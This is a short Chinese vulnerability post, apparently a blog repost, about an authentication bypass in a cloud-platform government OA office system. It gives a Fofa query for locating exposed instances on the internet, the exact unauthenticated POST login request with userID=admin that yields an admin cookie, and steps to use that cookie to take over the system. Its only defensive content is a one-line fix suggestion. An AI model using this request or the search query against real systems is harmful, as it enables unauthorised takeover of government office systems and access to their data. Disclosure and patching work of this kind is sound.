0x01 漏洞描述:
数字通云平台智慧政务OA产品是基于云计算、大数据、人工智能等先进技术,为政府部门量身定制的智能化办公系统。该系统旨在提高政府部门的办公效率、协同能力和信息资源共享水平,推动电子政务向更高层次发展。
数字通云平台 智慧政务OA login接口存在未授权获取默认cookie,未经身份验证的远程攻击者可利用该漏洞伪造登录,从而接管整个系统。
0x02 搜索语句:
Fofa:body="assets/8cca19ff/css/bootstrap-yii.css"
0x03 漏洞复现:
该漏洞是由于系统中存在默认cookie获取接口导致的权限绕过
POST /portal/default/login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
userID=admin&flag=rone
获取cookie
将cookie 写入到浏览器中
直接访问ip或者
http://your-ip:port/theme/concise
0x04 修复建议:
系统禁用默认获取cookie接口
标签:登录,获取,ip,漏洞,cookie,login,通云 From: https://blog.csdn.net/xc_214/article/details/142451124